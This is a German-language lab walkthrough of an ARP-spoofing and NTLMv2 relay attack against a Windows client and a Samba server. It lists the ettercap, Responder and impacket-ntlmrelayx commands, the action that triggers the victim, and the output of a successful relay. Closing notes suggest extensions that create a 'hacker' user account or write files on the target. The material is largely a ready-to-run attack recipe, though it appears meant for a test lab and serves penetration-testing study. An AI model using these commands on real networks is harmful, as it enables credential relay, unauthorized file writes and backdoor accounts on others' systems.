ARP-Spoofing & NTLMv2-Relay gegen SMB-Zielserver

Zielsetzung

Ein Windows-10-Client (10.0.10.102) wird per ARP-Spoofing in einen Man-in-the-Middle gebracht. Anschließend wird mittels LLMNR/NBNS-Spoofing durch Responder ein NTLMv2-Hash abgefangen und mit ntlmrelayx an einen Samba-Server (10.0.10.104) weitergeleitet, um dort eine Datei hochzuladen.

Umgebung

Vorbereitung auf Kali (10.0.10.101)

Relay-Verzeichnis erstellen

• Ein Verzeichnis vorbereiten, das als SMB-Share-Inhalt übergeben wird:

mkdir -p ~/relay-share
echo "Owned by Kali" > ~/relay-share/pwned.txt

Angriffsdurchführung auf Kali (10.0.10.101)

ARP-Spoofing mit Ettercap

• Zielgerät in MITM bringen:

ettercap -Tq -i eth0 -M arp:remote /10.0.10.102/ //

Responder starten

• LLMNR/NBNS-Spoofing aktivieren, aber SMB deaktivieren:

responder -I eth0 -wrf --no-smb --no-dhcp

ntlmrelayx starten

• Hash wird empfangen und an das Ziel relayed:

impacket-ntlmrelayx -t smb://10.0.10.104 -smb2support -i ~/relay-share --no-wcf-server --no-ldap

Aktion auf dem Windows-Client (10.0.10.102)

• Windows Explorer öffnen und in die Adresszeile eingeben:

 \\irgendwas\test

ODER:

• In der Eingabeaufforderung ausführen:

 dir \\irgendeinserver\c$

Ergebnis auf Kali (10.0.10.101)

• Auf dem SMB-Ziel (10.0.10.104) befindet sich im Share die Datei „pwned.txt“.
• In ntlmrelayx erscheint:

 [*] SMB relay attack successful...
 [*] Uploaded file pwned.txt to share

Hinweise

• Kein IP-Forwarding notwendig, da Ettercap auf Layer 2 arbeitet.
• Funktioniert nur, wenn SMB-Signing auf dem Ziel deaktiviert ist.
• Kann erweitert werden mit:

 --command "net user hacker 1234 /add"
 oder
 --command "cmd.exe /c echo PWNED > C:\pwned.txt"